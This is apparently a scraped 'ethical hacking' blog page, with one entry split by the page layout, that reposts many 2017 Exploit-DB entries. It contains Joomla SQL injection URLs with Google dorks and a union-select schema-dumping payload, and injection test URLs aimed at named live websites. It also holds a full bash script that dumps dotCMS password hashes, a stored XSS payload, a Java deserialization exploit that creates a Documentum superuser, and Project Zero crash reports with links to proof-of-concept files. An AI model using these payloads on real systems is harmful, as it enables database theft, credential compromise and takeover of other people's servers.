# # # # #
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
# Version: 4.1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863584679
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_wmt_content_timeline
# Date: 17.02.2017
# Vendor Homepage: http://devecostudio.com
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
# # # # #
# # # # #
# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_groovygallery
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
# Demo: http://addonstreet.com/products/groovy-gallery
# Version: 1.0.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_teamdisplay
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/
# Demo: http://addonstreet.com/demo/teamdisplay/
# Version: 1.2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component JEmbedAll v1.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_jembedall
# Date: 16.02.2017
# Vendor Homepage: http://www.goldengravel.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/jembedall/
# Demo: http://www.goldengravel.eu/
# Version: 1.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jembedall&downloadfree=[SQL]
# http://localhost/[PATH]/index.php?option=com_jembedall&export=articlepdf&id=[SQL]
# # # # #
http://www.goldengravel.eu/index.php?option=com_jembedall&downloadfree=4'
http://www.goldengravel.eu/index.php?option=com_jembedall&export=articlepdf&id=4'
http://www.supravirtual.ro/index.php?option=com_jembedall&downloadfree=4'
http://www.supravirtual.ro/index.php?option=com_jembedall&export=articlepdf&id=4'
: '
# Blind Boolean SQL Injection in dotCMS <= 3.6.1 (CVE-2017-5344)
## Product Description
dotCMS is a scalable, java based, open source content management system
(CMS) that has been designed to manage and deliver personalized, permission
based content experiences across multiple channels. dotCMS can serve as the
plaform for sites, mobile apps, mini-sites, portals, intranets or as a
headless CMS (content is consumed via RESTful APIs). dotCMS is used
everywhere, from running small sites to powering multi-node installations
for governemnts, Fortune 100 companies, Universities and Global Brands. A
dotCMS environment can scale to support hundreds of editors managing
thousands of sites with millions of content objects.
## Vulnerability Type
Blind Boolean SQL injection
## Vulnerability Description
dotCMS versions up to 3.6.1 (and possibly others) are vulnerable to blind
boolean SQL injection in the q and inode parameters at the
/categoriesServlet path. This servlet is a remotely accessible,
unauthenticated function of default dotCMS installations and can be
exploited to exfiltrate sensitive information from databases accessible to
the DMBS user configured with the product.
Exploitation of the vulnerability is limited to the MySQL DMBS in 3.5 -
3.6.1 as SQL escaping controls were added to address a similar
vulnerability discovered in previous versions of the product. The means of
bypassing these features which realise this vulnerability have only been
successfully tested with MySQL 5.5, 5.6 and 5.7 and it is believed other
DMBSes are not affected. Versions prior to 3.6 do not have these controls
and can be exploited directly on a greater number of paired DMBSes.
PostgreSQL is vulnerable in all described versions of dotCMS when
PostgreSQL standard_confirming_strings setting is disabled (enabled by
default).
The vulnerability is the result of string interpolation and directly SQL
statement execution without sanitising user input. The intermediate
resolution for a previous SQLi vulnerability was to whitelist and partially
filter user input before interpolation. This vulnerability overcomes this
filtering to perform blind boolean SQL injection. The resolution to this
vulnerability was to implement the use of prepared statements in the
affected locations.
This vulnerability has been present in dotCMS since at least since version
3.0.
## Exploit
A proof of concept is available here:
https://github.com/xdrr/webapp-exploits/tree/master/vendors/dotcms/2017.01.blind-sqli
## Versions
dotCMS <= 3.3.2 and MYSQL, MSSQL, H2, PostgreSQL
dotCMS 3.5 - 3.6.1 and (MYSQL or PostgreSQL w/ standard_confirming_strings
disabled)
## Attack Type
Unauthenticated, Remote
## Impact
The SQL injection vulnerability can be used to exfiltrate sensitive
information from the DBMS used with dotCMS. Depending of the DBMS
configuration and type, the issue could be as severe as establishing a
remote shell (such as by using xp_exec on MSSQL servers) or in the most
limited cases, restricted only to exfiltration of data in dotCMS database
tables.
## Credit
This vulnerability was discovered by Ben Nott <pajexali@gmail.com>.
Credit goes to Erlar Lang for discovering similar SQL injection
vulnerabilities in nearby code and for inspiring this discovery.
## Disclosure Timeline
* Jan 2, 2017 - Issue discovered.
* Jan 2, 2017 - Vendor advised of discovery and contact requested for
full disclosure.
* Jan 4, 2017 - Provided full disclosure to vendor.
* Jan 5, 2017 - Vendor acknowledged disclosure and confirmed finding
validity.
* Jan 14, 2017 - Vendor advised patch developed and preparing for release.
* Jan 24, 2017 - Vendor advised patching in progress.
* Feb 15, 2017 - Vendor advises ready for public disclosure.
## References
Vendor advisory: http://dotcms.com/security/SI-39
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5344
'
#!/bin/bash
#
# Dump password hashes from dotCMS <= 3.6.1 using blind boolean SQL injection.
# CVE: CVE-2017-5344
# Author: Ben Nott <pajexali@gmail.com>
# Date: January 2017
#
# Note this exploit is tuned for MySQL backends but can be adapted
# for other DMBS's.
show_usage() {
echo "Usage $0 [target]"
echo
echo "Where:"
echo -e "target\t...\thttp://target.example.com (no trailing slash, port optional)"
echo
echo "For example:"
echo
echo "$0 http://www.examplesite.com"
echo "$0 https://www.mycmssite.com:9443"
echo
exit 1
}
test_exploit() {
target=$1
res=$(curl -k -s -X 'GET' \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \
"${target}/categoriesServlet?q=%5c%5c%27")
if [ $? -ne 0 ];
then
echo "Failed to connect. Check host and try again!"
exit 1
fi
if [ -z "$res" ];
then
echo "The target appears vulnerable. We're good to go!"
else
echo "The target isn't vulnerable."
exit 1
fi
}
dump_char() {
target=$1
char=$2
database=$3
index=$4
offset=$5
column=$6
avg_delay=$7
if [ -z "$offset" ];
then
offset=1
fi
if [[ $char != *"char("* ]];
then
char="%22${char}%22"
fi
if [ -z "$column" ];
then
column="password_"
fi
# Controls the avg delay of a FALSE
# request
if [ -z "$avg_delay" ];
then
avg_delay="0.100"
fi
res=$(curl -k -sS \
-w " %{time_total}" \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \
"${target}/categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SELECT(SUBSTRING((SELECT(${column})FROM(${database}.user_)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23")
data=$(echo $res | awk '{print $1}')
rtt=$(echo $res | awk '{print $2}')
# Calculate boolean based on time delay and
# data presence.
has_delay=$(echo "${rtt}>${avg_delay}" | bc -l)
if [ ! -z "$data" ];
then
if [ $has_delay -eq 1 ];
then
echo "$char"
fi
fi
}
testdb() {
target=$1
res=$(dump_char $target 1 "dotcms" 1 1)
if [ ! -z "$res" ];
then
echo "dotcms"
else
res=$(dump_char $target 1 "dotcms2")
if [ ! -z "$res" ];
then
echo "dotcms2"
fi
fi
}
convert_char() {
char=$1
conv="$char"
if [ "$char" == "char(58)" ];
then
conv=":"
elif [ "$char" == "char(47)" ];
then
conv="/"
elif [ "$char" == "char(61)" ];
then
conv="="
elif [ "$char" == "char(45)" ];
then
conv="-"
fi
echo -n "$conv"
}
a2chr() {
a=$1
printf 'char(%02d)' \'$a
}
n2chr() {
n=$1
printf 'char(%d)' $n
}
chr2a() {
chr=$1
chr=$(echo $chr | sed -e 's/char(//g' -e 's/)//g')
chr=`printf \\\\$(printf '%03o' $chr)`
echo -n $chr
}
iter_chars() {
target=$1
db=$2
user=$3
offset=$4
column=$5
for c in {32..36} {38..94} {96..126}
do
c=$(n2chr $c)
res=$(dump_char $target $c $db $user $offset $column)
if [ ! -z "$res" ];
then
chr2a $res
break
fi
done
}
exploit() {
target=$1
db=$(testdb $target)
if [ -z "$db" ];
then
echo "Unable to identify database name used by dotcms instance!"
exit 1
fi
echo "Dumping users and passwords from database..."
echo
for user in $(seq 0 1023);
do
validuser=1
echo -n "| $user | "
for offset in $(seq 1 1024);
do
res=$(iter_chars $target $db $user $offset "userid")
if [ -z "$res" ];
then
if [ $offset -eq 1 ];
then
validuser=0
fi
break
fi
echo -n "$res";
done
if [ $validuser -eq 1 ];
then
printf " | "
else
printf " |\n"
break
fi
for offset in $(seq 1 1024);
do
res=$(iter_chars $target $db $user $offset "password_")
if [ -z "$res" ];
then
break
fi
echo -n "$res";
done
printf " |\n"
done
echo
echo "Dumping complete!"
}
target=$1
if [ -z "$target" ];
then
show_usage
fi
test_exploit $target
exploit $target
# Exploit Title: Authorized Stored XSS at WordPress Corner-Ad plugin.
# Google Dork: inurl:/wp-content/plugins/corner-ad
# Date: 16-02-17
# Exploit Author: Atik Rahman
# Vendor Homepage: https://wordpress.org/plugins/corner-ad/
# Software Link: https://downloads.wordpress.org/plugin/corner-ad.zip
# Version: 1.0.7
# Tested on: Firefox 44, Windows10
Vendor Description
---------------------
*Corner Ad* is a plugin which display you ads in a corner of your
WordPress website page.
The Plugin has 1,000+ active install.
Stored XSS in Ad Name
----------------------
Ad name input fields aren't properly escaped. This
could lead to an XSS attack that could possibly affect
administrators,users,editor.
1. Go to http://localhost/wp-admin/options-general.php?page=corner-ad.php
2. Click on create new Add button.
3. And Use Ad name as "/><svg/onload=prompt(document.domain)> *Fill
the other field.
4.Now Click on save corner Add button when it's add a new add go to the
http://localhost/wp-admin/options-general.php?page=corner-ad.php
for corner add list. And now Your xss will
be executed.
5. If a normal editor,author visit the corner add list page xss will
effect them also.
# # # # #
# Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfaq
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/
# Demo: http://demo.web-dorado.com/spider-faq.html
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Facebook v1.6.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfacebook
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-display/spider-facebook/
# Demo: http://demo.web-dorado.com/spider-facebook.html
# Version: 1.6.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfacebook&task=loginwith&name=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercatalog
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/
# Demo: http://demo.web-dorado.com/spider-catalog.html
# Version: 1.8.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL]
#
http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Calendar Lite v3.2.16 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercalendar
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/spider-calendar-lite/
# Demo: http://demo.web-dorado.com/spider-calendar.html
# Version: 3.2.16
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL]
# Etc...
# # # # #
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=998
The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: https://portal/+webvpn+/CIFS_R/share_server/share_name/file.
When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct:
http_cifs_context:
+0x160 char* file_dir
+0x168 char* file_name
These strings are copied in various places, but is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:
filename_copy_buf = calloc(1LL, 336LL);
net_handle[10] = filename_copy_buf;
if ( filename_copy_buf )
{
src_len = _wrap_strlen(filename_from_request);
if ( filename_from_request[src_len - 1] == ('|') )
{
// wrong length (src length)
strncpy((char *)filename_copy_buf, filename_from_request,
src_len - 1);
}
In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow.
There appear to be various other places where the copying is done in an unsafe way:
http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.
http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.
Possibly http_add_query_str_from_context. There are probably others that I missed.
Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.
Repro:
Login to WebVPN portal, navigate to:
https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's.
("server" and "name" may be passed verbatim)
*** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
/lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
/lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
/lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
lina(+0x321976a)[0x7fa41a2b276a]
lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
lina(resMgrCalloc+0x100)[0x7fa419659410]
lina(calloc+0x94)[0x7fa419589a34]
lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
lina(ewsServeFindDocument+0x142)[0x7fa418278192]
lina(ewsServeStart+0x114)[0x7fa4182784a4]
lina(ewsParse+0x19a0)[0x7fa418272cc0]
lina(ewsRun+0x9c)[0x7fa41826955c]
lina(emweb_th+0x6ab)[0x7fa418286aeb]
lina(+0xde58ab)[0x7fa417e7e8ab]
This was tested on 9.6(2)
# # # # #
# Exploit Title: Joomla! Component JSP Store Locator v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_jsplocation
# Date: 15.02.2017
# Vendor Homepage: http://joomlaserviceprovider.com
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/jsplocation/
# Demo: http://demo.joomlaserviceprovider.com/index.php/joomla/extensions/jsp-location-classic-theme
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=directionview&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=redirectviewinfo&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=[SQL]
# Etc...
# # # # #
# Exploit Title: GOM Player 2.3.10.5266 - Remote heap corruption (.fpx)
# Date: 2017-02-15
# Exploit Author: Peter Baris
# Exploit link: http://www.saptech-erp.com.au/resources/PoC.zip
# Software Link: http://player.gomlab.com/download.gom?language=eng
# CVE: CVE-2017-5881
# Version: 2.3.10.5266
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41367.zip
Open the malicious fpx file with CTRL+U, served by a webserver:
WinDbg
(864.150): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=092fcde8 ebx=00000000 ecx=41414141 edx=090ff798 esi=090ff790
edi=05b10000
eip=77902fe5 esp=10a9fbb4 ebp=10a9fc94 iopl=0 nv up ei ng nz na pe
cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010287
ntdll!RtlpFreeHeap+0x4d6:
77902fe5 8b19 mov ebx,dword ptr [ecx]
ds:002b:41414141=????????
0:022> !exchain
10a9fc84: ntdll!_except_handler4+0 (77946325)
CRT scope 0, func: ntdll!RtlpFreeHeap+b7d (7795b52d)
10a9fd54: *** WARNING: Unable to verify checksum for C:\Program Files
(x86)\GRETECH\GomPlayer\gvf.ax
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files (x86)\GRETECH\GomPlayer\gvf.ax -
gvf!DllGetClassObject+5801b (6e02bc7b)
10a9fdcc: gvf!DllGetClassObject+57af8 (6e02b758)
10a9fe00: gvf!DllGetClassObject+57ac8 (6e02b728)
10a9fe84: gvf!DllGetClassObject+57fe0 (6e02bc40)
10a9feac: gvf!DllGetClassObject+5d5e8 (6e031248)
10a9ff60: ntdll!_except_handler4+0 (77946325)
CRT scope 0, filter: ntdll!__RtlUserThreadStart+2e (77946608)
func: ntdll!__RtlUserThreadStart+63 (77948227)
10a9ff80: ntdll!FinalExceptionHandler+0 (779983b1)
Invalid exception stack at ffffffff
2017-02-04 notification sent to developers
2017-02-05 developerss requested information about the issue
2017-02-09 information sent with the PoC
no reply if they plan to release a fix or not
/**
CVE Identifier: CVE-2017-5586
Vendor: OpenText
Affected products: Documentum D2 version 4.x
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Description: Document D2 contains vulnerable BeanShell (bsh) and Apache Commons libraries and accepts serialised data from untrusted sources, which leads to remote code execution
Proof of concept:
===================================8<===========================================
*/
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.PriorityQueue;
import bsh.Interpreter;
import bsh.XThis;
import com.documentum.fc.client.content.impl.ContentStoreResult;
import com.documentum.fc.client.impl.typeddata.TypedData;
/**
* @author Andrey B. Panfilov <andrey (at) panfilov (dot) tel [email concealed]>
*
* Code below creates superuser account in underlying Documentum repository
* usage: java DocumentumD2BeanShellPoc http://host:port/D2 <docbase_name> <user_name_to_create>
*
*/
@SuppressWarnings("unchecked")
public class DocumentumD2BeanShellPoc {
public static void main(String[] args) throws Exception {
String url = args[0];
String docbase = args[1];
String userName = args[2];
String payload = "compare(Object foo, Object bar) {new Interpreter()"
+ ".eval(\"try{com.documentum.fc.client.IDfSession session = com.documentum.fc.impl.RuntimeContext.getInstance()"
+ ".getSessionRegistry().getAllSessions().iterator().next();"
+ "session=com.emc.d2.api.D2Session.getAdminSession(session, false);"
+ "com.documentum.fc.client.IDfQuery query = new com.documentum.fc.client.DfQuery("
+ "\\\"CREATE dm_user object set user_name='%s',set user_login_name='%s',set user_source='inline password', "
+ "set user_password='%s', set user_privileges=16\\\");query.execute(session, 3);} "
+ "catch (Exception e) {}; return 0;\");}";
Interpreter interpreter = new Interpreter();
interpreter.eval(String.format(payload, userName, userName, userName));
XThis x = new XThis(interpreter.getNameSpace(), interpreter);
Comparator comparator = (Comparator) x.getInterface(new Class[] { Comparator.class, });
PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] { 1, 1 };
setFieldValue(priorityQueue, "queue", queue);
setFieldValue(priorityQueue, "size", 2);
// actually we may send priorityQueue directly, but I want to hide
// deserialization stuff from stacktrace :)
Class cls = Class.forName("com.documentum.fc.client.impl.typeddata.ValueHolder");
Constructor ctor = cls.getConstructor();
ctor.setAccessible(true);
Object valueHolder = ctor.newInstance();
setFieldValue(valueHolder, "m_value", priorityQueue);
List valueHolders = new ArrayList();
valueHolders.add(valueHolder);
TypedData data = new TypedData();
setFieldValue(data, "m_valueHolders", valueHolders);
ContentStoreResult result = new ContentStoreResult();
setFieldValue(result, "m_attrs", data);
ByteArrayOutputStream baos = new ByteArrayOutputStream();
DataOutputStream dos = new DataOutputStream(baos);
for (Character c : "SAVED".toCharArray()) {
dos.write(c);
}
dos.write((byte) 124);
dos.flush();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(result);
oos.flush();
byte[] bytes = baos.toByteArray();
baos = new ByteArrayOutputStream();
dos = new DataOutputStream(baos);
dos.writeInt(bytes.length);
dos.write(bytes);
dos.flush();
HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection();
conn.setRequestProperty("Content-Type", "application/octet-stream");
conn.setRequestMethod("POST");
conn.setUseCaches(false);
conn.setDoOutput(true);
conn.getOutputStream().write(baos.toByteArray());
conn.connect();
System.out.println("Response code: " + conn.getResponseCode());
InputStream stream = conn.getInputStream();
byte[] buff = new byte[1024];
int count = 0;
while ((count = stream.read(buff)) != -1) {
System.out.write(buff, 0, count);
}
}
public static String makeUrl(String url) {
if (!url.endsWith("/")) {
url += "/";
}
return url + "servlet/DoOperation?origD2BocsServletName=Checkin&id=1&file=/etc/passwd
&file_length=1000"
+ "&_username=dmc_wdk_preferences_owner&_password=webtop";
}
public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
Field field = clazz.getDeclaredField(fieldName);
if (field == null && clazz.getSuperclass() != null) {
field = getField(clazz.getSuperclass(), fieldName);
}
field.setAccessible(true);
return field;
}
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
}
/**
===================================>8===========================================
Disclosure timeline:
2016.02.28: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure
*/
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1012
DxgkDdiSubmitCommandVirtual is the function implemented by the kernel mode driver
responsible for submitting a command buffer to the GPU. One of the arguments passed
contains vendor specific data from the user mode driver. The kernel allocates a single
buffer for this purpose for all submit calls for the same context.
NVIDIA implements this data as:
struct NvPrivateHeader {
DWORD magic;
WORD unknown_4;
WORD unknown_6;
DWORD unknown_8;
DWORD size;
};
struct NvPrivateData {
NvPrivateHeader header;
DWORD unknown_0;
DWORD unknown_1;
DWORD some_size;
DWORD unknown_2;
PVOID a_gpu_address_maybe;
BYTE unknown[1220];
};
In one of the functions that process this data, there appears to be code to
shift around the contents of this user private data.
// |len| is controlled by the user. can come from the |some_size| field if the
|a_gpu_address_maybe| field is 0.
if ( len ) {
if ( 8 * len >= pCommand_->DmaBufferPrivateDataSize - 0x4E8 )
do_debug_thingo(); // doesn't stop the memcpy
priv_data = (NvSubmitPrivateData *)pCommand_->pDmaBufferPrivateData;
src = (char *)priv_data + priv_data->header.size; // unchecked length
priv_data = (NvSubmitPrivateData *)((char *)priv_data + 1256);
*(_QWORD *)&v4->unknown_0[256] = priv_data;
// potential bad memcpy
memcpy(priv_data, src, 8 * len);
}
There are two main problems here: the |len| value is checked, but that appears
to only call a debug logging function and not actually stop the memcpy that
occurs afterwards.
Also, the |size| field from the header is not properly
checked to be smaller than the actual size of the data (this is also checked in
the calling function but once again only calls do_debug_thingo()).
This lets an attacker specify an arbitrary length for the copy, as well as
specify an arbitrary 32-bit offset to copy from, leading to pool memory corruption.
Crashing context with PoC (Win 10 x64, driver version 375.95):
PAGE_FAULT_IN_NONPAGED_AREA (50)
...
rax=0000000000000008 rbx=0000000000000000 rcx=ffffb2087fe8f4f0
rdx=0000000041413c59 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8035fc15b00 rsp=ffffd88179edd1a8 rbp=0000000000000080
r8=00000000020a0a08 r9=0000000000105050 r10=0000000000000000
r11=ffffb2087fe8f4f0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
nvlddmkm+0x5e5b00:
fffff803`5fc15b00 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx] ds:ffffb208`c12a3149=????????????????????????????????
Resetting default scope
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41365.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=985
The DxgkDdiEscape handler for 0x100008b accepts a user supplied size as the
limit for a loop, leading to OOB reads and writes.
The supplied PoC passes an invalid size of 0x41414141, which causes a crash in:
__int64 sub_30A500(__int64 a1, __int64 a2, _DWORD *ptr, unsigned int user_supplied_size)
{
__int64 i; // r11@2
if ( user_supplied_size )
{
i = user_supplied_size;
do
{
if ( *ptr == 3 || (unsigned int)(*ptr - 9) <= 1 )
*ptr = 0;
ptr += 3;
--i;
}
while ( i );
Crashing context on Win 10 x64, driver version 375.70:
TRAP_FRAME: ffffd000266219e0 -- (.trap 0xffffd000266219e0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=00000000fffffff7 rbx=0000000000000000 rcx=ffffe000d6315000
rdx=ffffe000d691b000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8010e34a50b rsp=ffffd00026621b78 rbp=ffffe000d691b000
r8=ffffd000266228a8 r9=0000000041414141 r10=ffffd00026623004
r11=00000000414140a4 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
nvlddmkm+0x2fa50b:
fffff801`0e34a50b 418b02 mov eax,dword ptr [r10] ds:ffffd000`26623004=????????
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41364.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=992
